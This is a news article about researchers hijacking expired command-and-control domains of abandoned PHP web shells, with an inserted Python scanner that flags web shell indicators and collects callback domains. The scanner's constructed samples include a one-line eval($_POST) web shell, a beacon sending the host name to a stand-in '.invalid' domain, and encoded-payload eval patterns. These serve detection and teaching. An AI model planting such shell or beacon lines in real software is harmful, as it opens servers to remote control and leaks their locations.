At least 4,000 unique web backdoors previously deployed by various threat actors were captured by taking control of abandoned and outdated infrastructure for as little as $20 per domain.
Cybersecurity company watchTowr Labs said it carried out the operation by registering more than 40 domain names that the backdoors were designed to use for command-and-control (C2) purposes. The domains involved in the study were subsequently handled in partnership with the Shadowserver Foundation.
“We hijacked backdoors (that depended on now-abandoned infrastructure and/or expired domains) that existed inside backdoors themselves, and have watched the results flow ever since,” watchTowr Labs CEO Benjamin Harris and researcher Aliz Hammond said in the technical write-up last week.
“This capture allowed us to track compromised hosts as they ‘reported’ and in theory gave us command and control over those compromised hosts.”
Compromised hosts identified through these beacons included government entities in Bangladesh, China, and Nigeria, as well as academic institutions in China, South Korea, and Thailand, among others.
The backdoors, which are essentially web shells designed to give an attacker persistent remote access to a target network for later use, vary in scope and functionality:
- Simple web shells that are able to execute an attacker’s command using PHP code
- c99shell
- r57shell
- China Chopper, a web shell used by China-nexus advanced persistent threat (APT) groups.
Both c99shell and r57shell are full-featured web shells with the ability to execute arbitrary code or commands, perform file operations, deploy additional payloads, brute force FTP servers, and remove themselves from compromised nodes.
watchTowr Labs said it also saw cases where the developers of some of these web shells had backdoored them so that they leaked the locations where they were deployed, thereby inadvertently handing control over to other threat actors.
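The two defender-side tasks implied by the last two paragraphs are spotting the web shell families described above on a web server and recovering the hostnames such shells phone home to, since those are the domains that, once abandoned, anyone can register. The following Python script is an added example written for this article and is not watchTowr's or Shadowserver's tooling. The sample files, rule names, and `.invalid` callback domains are constructed for illustration; the regexes cover only the generic indicators the article mentions (evaluation of request input, encoded-payload evaluation, and the c99shell/r57shell family names), not a complete signature set.

```python
import re
from dataclasses import dataclass

# Constructed sample files for this example (hypothetical content, not real
# shell source): one benign file and three that each trip a different rule.
SAMPLE_FILES = {
    "uploads/avatar.php": "<?php\n// ordinary application code\necho htmlspecialchars($_GET['name']);\n",
    "tmp/.cache.php": "<?php @eval($_POST['pass']); ?>\n",
    "img/logo.php": (
        "<?php\n/* c99shell variant */\n"
        "file_get_contents('http://stats.example-c2.invalid/p.php?h=' . $_SERVER['HTTP_HOST']);\n"
    ),
    "inc/help.php": (
        "<?php eval(gzinflate(base64_decode($blob)));\n"
        "// beacon: http://cdn.example-old.invalid/x\n"
    ),
}

# Generic web shell indicators; rule names are our own labels.
RULES = [
    ("eval-of-request-input",
     re.compile(r"eval\s*\(\s*@?\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I)),
    ("exec-of-request-input",
     re.compile(r"\b(?:system|shell_exec|passthru|exec)\s*\(\s*\$_(?:POST|GET|REQUEST)\b", re.I)),
    ("encoded-payload-eval",
     re.compile(r"eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(", re.I)),
    ("known-shell-family",
     re.compile(r"\b(?:c99shell|r57shell)\b", re.I)),
]

# Hostname part of any http(s) URL embedded in the file.
CALLBACK_RE = re.compile(r"https?://([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,})", re.I)


@dataclass
class Finding:
    path: str
    rules: list       # names of the rules that matched
    callbacks: list   # hostnames the file contacts (candidate C2 domains)


def scan_content(path: str, content: str):
    """Return a Finding if any rule matches the file content, else None."""
    hits = [name for name, rx in RULES if rx.search(content)]
    if not hits:
        return None
    # Hostnames a flagged file reaches out to are the domains worth watching:
    # if one expires, whoever registers it inherits the beacons.
    callbacks = sorted({m.group(1).lower() for m in CALLBACK_RE.finditer(content)})
    return Finding(path, hits, callbacks)


def scan_files(files: dict) -> list:
    """Scan a {path: content} mapping; paths are processed in sorted order."""
    return [f for f in (scan_content(p, c) for p, c in sorted(files.items())) if f]


def callback_domains(findings) -> set:
    """Union of all callback hostnames across findings, for a watch/sinkhole list."""
    return {d for f in findings for d in f.callbacks}


if __name__ == "__main__":
    results = scan_files(SAMPLE_FILES)
    for f in results:
        print(f"{f.path}: rules={f.rules} callbacks={f.callbacks}")
    print("domains to monitor:", sorted(callback_domains(results)))
```

On a real host the `SAMPLE_FILES` mapping would be replaced by reading the document root (for example every `*.php` under the web directory), and the resulting domain list is what you would check for expiry or hand to a sinkhole operator; the rules are deliberately narrow and should be treated as a starting point for triage rather than a complete detection set.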
The development comes a couple of months after the company revealed it had spent just $20 to acquire an obsolete WHOIS server domain (“whois.dotmobiregistry(.)net”) associated with the .mobi top-level domain (TLD), identifying more than 135,000 unique systems that still communicated with the server even after it had been moved to “whois.nic(.)mobi.”
These included various private companies, such as VirusTotal, as well as mail servers for countless government, military, and university organizations. The .gov addresses belonged to Argentina, Bangladesh, Bhutan, Ethiopia, India, Indonesia, Israel, Pakistan, the Philippines, Ukraine, and the United States.
“It’s somewhat encouraging to see attackers making the same mistakes as defenders,” watchTowr Labs said. “It’s easy to think that attackers are never wrong, but we’ve seen evidence of the opposite — boxes with open web shells, expired domains, and the use of software that was backdoored.”